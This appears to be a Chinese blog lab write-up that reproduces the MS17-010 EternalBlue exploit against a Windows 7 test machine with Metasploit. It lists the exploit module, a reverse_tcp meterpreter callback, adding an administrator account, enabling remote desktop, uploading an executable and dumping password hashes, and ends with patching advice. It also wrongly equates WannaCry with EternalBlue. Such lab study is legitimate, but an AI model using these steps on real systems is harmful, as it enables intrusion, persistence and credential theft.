一、漏洞简介
1、爆发于17年左右,一种名为WannaCry(永恒之蓝)的电脑勒索病毒,基于SMB协议,利用开放TCP445端口的机器进行攻击,只要机主开机联网,就可通过漏洞来控制主机,植入木马,窃取用户隐私,进行勒索。
2、影响版本:Windows xp,Windows 2003,Windows 7、Windows 8,Windows 2008,Windows 2008 R2、Windows Server 2012等
二、复现环境
攻击机:kali-linux-2021(ip地址192.168.110.3)
靶机:windows7(ip地址192.168.110.133)
三、漏洞复现
- 确保靶机开启445端口,使用kali自带的nmap对靶机进行扫描
nmap 192.168.110.133
![](https://i-blog.csdnimg.cn/blog_migrate/ae2441e85599ab763c649fc842bacaba.png)
- 输入命令msfconsole,启动kali自带的msf
![](https://i-blog.csdnimg.cn/blog_migrate/d4cb0a333b50f565f57d32c7e9ddfe91.png)
3.根据漏洞名称搜索 : search ms17-010
![](https://i-blog.csdnimg.cn/blog_migrate/6590e2ff7ed4f5632a1d18d22d17fe84.png)
- 运用辅助模块扫描目标
设置模块:use auxiliary/scanner/smb/smb_ms17_010
![](https://i-blog.csdnimg.cn/blog_migrate/8095ec773a911106488919f14a0e3d23.png)
查看设置:options
![](https://i-blog.csdnimg.cn/blog_migrate/cf2bb357f6c6be82ff0de2327421f3f5.png)
设置目标地址:set rhosts 192.168.110.133
![](https://i-blog.csdnimg.cn/blog_migrate/7b45560e7819e64f25f4010d85039f1c.png)
设置好了之后,run或者exploit 进行攻击
![](https://i-blog.csdnimg.cn/blog_migrate/7756415cfce35773ffd224f78d10a993.png)
绿色的加号为可攻击
- 设置攻击模块对目标进行攻击
使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue
查看所需设置:options
![](https://i-blog.csdnimg.cn/blog_migrate/c1d150c53db0a78a7efd6107fbb0ae91.png)
设置目标地址:set RHOSTS 192.168.110.133
设置目标端口:set RPORT 445(默认)
设置payload:set payload windows/x64/meterpreter/reverse_tcp(默认)
设置本地地址:set LHOST 192.168.110.3(默认)
攻击:run或者exploit
![](https://i-blog.csdnimg.cn/blog_migrate/886f1d78a5a7c2e6afbe146ea32a5503.png)
成功建立会话
![](https://i-blog.csdnimg.cn/blog_migrate/9251c7e7b0cbbfa20bf0aefbd90f9152.png)
查看目前权限,为系统权限
![](https://i-blog.csdnimg.cn/blog_migrate/9b4dd369c47482f1593927c356e16fcf.png)
![](https://i-blog.csdnimg.cn/blog_migrate/0dedfc401a49abd270acb27be4642f2a.png)
使用shell进入命令窗口(输入chcp 65001解决乱码问题)
![](https://i-blog.csdnimg.cn/blog_migrate/7dafba88b476c5e7ca1610ca2c091d8b.png)
创建新用户wang 123并加入管理员组
![](https://i-blog.csdnimg.cn/blog_migrate/11e62ddc14f3da0c4e3c560101e3d597.png)
在meterpreter 界面输入 run getgui -e 开启目标靶机的远程桌面
![](https://i-blog.csdnimg.cn/blog_migrate/fd9f9a1a1a501086edbd196e4f2b2ce9.png)
screenshot #可以对靶机屏幕截图
![](https://i-blog.csdnimg.cn/blog_migrate/c9a4b5f81cb87bd2da8ed100f2fce5e8.png)
使用upload 上传文件
upload /home/kali/桌面/Server.exe C:\\Windows
![](https://i-blog.csdnimg.cn/blog_migrate/578065a874372ae383551b1491a4af04.png)
其他命令:
sysinfo #查看靶机信息
ipconfig #查看靶机网络配置
ifconfig #查看靶机网络配置
ps #查看靶机正在运行的进程
Hashdump#下载靶机的用户hash
四、漏洞解决方法
对系统进行升级或打补丁
2.开启防火墙,安装其他杀毒工具
3.关闭相应的端口